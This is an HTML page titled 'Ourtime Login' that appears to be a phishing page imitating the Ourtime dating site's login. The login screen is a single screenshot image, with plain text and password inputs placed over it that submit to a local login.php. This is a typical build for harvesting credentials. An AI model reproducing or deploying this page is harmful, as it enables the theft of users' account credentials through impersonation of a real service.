<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ourtime Login</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:653px; z-index:0"><img src="images/paste125.jpg" alt="" title="" border=0 width=1365 height=653></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:206px;left:231px;top:161px;z-index:2;height: 36px;" required="">
<input name="formtext2" type="password" style="position:absolute;width:206px;left:230px;top:209px;z-index:3;height: 36px;" required="">
<div id="formimage1" style="position:absolute; left:220px; top:278px; z-index:4"><input type="image" name="formimage1" width="85" height="52" src="images/log.JPG"></div>
<div id="formcheckbox1" style="position:absolute; left:226px; top:252px; z-index:5"><input type="checkbox" name="formcheckbox1"></div>
</form>

<div id="image2" style="position:absolute; overflow:hidden; left:100px; top:435px; width:106px; height:25px; z-index:6"><img src="images/paste126.jpg" alt="" title="" border=0 width=106 height=25></div>


</body>
</html>
